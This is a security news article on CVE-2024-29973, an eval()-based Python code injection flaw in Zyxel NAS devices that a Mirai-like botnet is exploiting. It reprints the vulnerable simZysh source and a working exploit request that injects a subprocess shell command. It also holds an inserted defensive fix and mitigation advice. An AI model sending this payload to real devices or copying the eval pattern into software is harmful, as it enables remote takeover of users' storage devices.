Zyxel NAS Devices Under Attack: Mirai-Like Botnet Exploiting CVE-2024-29973

by Esmeralda McKenzie

A new vulnerability, CVE-2024-29973, has been found in Zyxel NAS devices, exposing them to attacks from a Mirai-like botnet.

This vulnerability, a Python code injection flaw, has raised serious concerns among cybersecurity experts and users alike.

According to the Outpost24 blog, the vulnerability stems from a flaw in the simZysh endpoint of the Zyxel NAS devices' web server.

This endpoint, introduced during a patch for a previous vulnerability (CVE-2023-27992), inadvertently replicated the same security mistakes.

The core issue lies in the use of the eval() function, which is notorious for its potential to execute arbitrary code when its input is not properly sanitized.

A recent tweet from the Shadowserver Foundation reported that Zyxel NAS devices are being attacked by a Mirai-like botnet that exploits CVE-2024-29973.

CVE-2024-29973 – Vulnerability Details

The simZysh function in the Zyxel NAS devices' Python web server is designed to simulate the output of zyshcgi.

However, the function's implementation contains several serious flaws:

class mainApplication(object):
    # Snip...
    def simZysh(self, *url_args, **request_args):
        """Simulate zyshcgi's output. GUI's broker shall set command as the following format:
            'controller_name action_name {"arg1": value, "arg2": value, ...}'
        """
        for i in url_args:
            if not check_str_format(i, 'url'):
                return tools_cherrypy.ARG_ERROR
        for key, value in request_args.items():
            if not check_str_format(key, 'request'):
                if not check_list(key):
                    return tools_cherrypy.ARG_ERROR
            if not check_str_format(value, 'request'):
                if not check_list(value):
                    return tools_cherrypy.ARG_ERROR
        r_value = {}
        c_index = 0
        while True:
            c_key = 'c%d' % c_index
            if request_args.has_key(c_key):
                # The request parameter is split into controller, action and
                # a free-form remainder; the remainder is never validated.
                controller_n, action_n, args = request_args[c_key].split(' ', 2)
                try:
                    controller = __import__('controllers.%s' % controller_n)
                    # The unvalidated remainder is interpolated into a string
                    # that is then passed to eval(), so it can contain arbitrary
                    # Python expressions (this is the CVE-2024-29973 flaw).
                    tmp_result = eval('controller.%s.%s(cherrypy=%s, arguments=%s)' % (
                        controller_n, action_n, 'cherrypy', args))
                    if not tmp_result:
                        raise ValueError
                    r_type = type(tmp_result)
                    if r_type == list:
                        r_value['zyshdata%d' % c_index] = tmp_result
                    else:
                        r_value['zyshdata%d' % c_index] = [tmp_result]
                    r_value['errno%d' % c_index] = 0
                    r_value['errmsg%d' % c_index] = _('OK')
                except:
                    r_value['zyshdata%d' % c_index] = []
                    r_value['errno%d' % c_index] = -99999
                    r_value['errmsg%d' % c_index] = _('Execute Error')
            else:
                break
            c_index += 1
        return r_value
    simZysh.exposed = True

Exploitation and Impact

The vulnerability allows attackers to inject arbitrary Python code by means of carefully crafted requests.

Attackers can execute commands on the device by bypassing the mod_auth_zyxel module and evading the Python input filters. For example, a malicious payload could look like this:

POST /cmd,/simZysh/register_main/setCookie

c0='storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("makekey", shell=True)#'

This payload exploits the eval() function to run the makekey command, potentially opening a backdoor on the device.
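The fix a defender would want for the simZysh pattern shown above, as an added example that is not Zyxel's code: the command string is parsed against a strict grammar and dispatched by name lookup into a whitelist, so the third field of the c0 parameter can never reach eval(). The StorageExtCgi class and the CONTROLLERS registry are hypothetical stand-ins for the device's controllers package.

```python
import json
import re

# Added example (not Zyxel's code): a strict parser and whitelist dispatcher for
# the 'controller_name action_name {"arg1": value, ...}' command format that
# simZysh's docstring describes, so that no request string ever reaches eval().

IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


class CommandError(ValueError):
    """Raised for any command that does not match the expected grammar."""


def parse_zysh_command(cmd):
    """Split 'controller action {json}' into its parts; reject anything else."""
    parts = cmd.split(" ", 2)
    if len(parts) != 3:
        raise CommandError("expected 'controller action args'")
    controller, action, raw_args = parts
    if not IDENT.match(controller) or not IDENT.match(action):
        raise CommandError("controller and action must be plain identifiers")
    try:
        args = json.loads(raw_args)
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        raise CommandError("arguments must be a JSON object")
    if not isinstance(args, dict):
        raise CommandError("arguments must be a JSON object")
    return controller, action, args


# Hypothetical stand-in for the NAS 'controllers' package.
class StorageExtCgi(object):
    def CGIGetExtStoInfo(self, cherrypy=None, arguments=None):
        return {"volumes": ["vol1"], "echo": arguments}


CONTROLLERS = {"storage_ext_cgi": StorageExtCgi()}


def dispatch(cmd):
    """Resolve controller and action by name lookup; nothing is evaluated."""
    controller, action, args = parse_zysh_command(cmd)
    target = CONTROLLERS.get(controller)
    handler = getattr(target, action, None) if target is not None else None
    if handler is None or action.startswith("_"):
        raise CommandError("unknown controller or action")
    return handler(cherrypy=None, arguments=args)
```

Fed the c0 value from the request above, parse_zysh_command() raises CommandError at the JSON step, because "None) and False or ..." is not a JSON object; a well-formed command such as 'storage_ext_cgi CGIGetExtStoInfo {"disk": 1}' is dispatched normally.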

Mitigation and Recommendations

Zyxel has been notified of the vulnerability and has released patches.

In the meantime, users are urged to:

  1. Disable Remote Access: Restrict remote access to the NAS devices to prevent exploitation.
  2. Apply Network Segmentation: Isolate NAS devices from the rest of the network to limit potential damage.
  3. Monitor Network Traffic: Watch for unusual network activity indicating an ongoing attack.

The discovery of CVE-2024-29973 highlights the ongoing challenges in securing IoT devices.

As attackers continue to exploit such vulnerabilities, it is crucial for manufacturers to implement robust security measures and for users to remain vigilant.

Source credit : cybersecuritynews.com
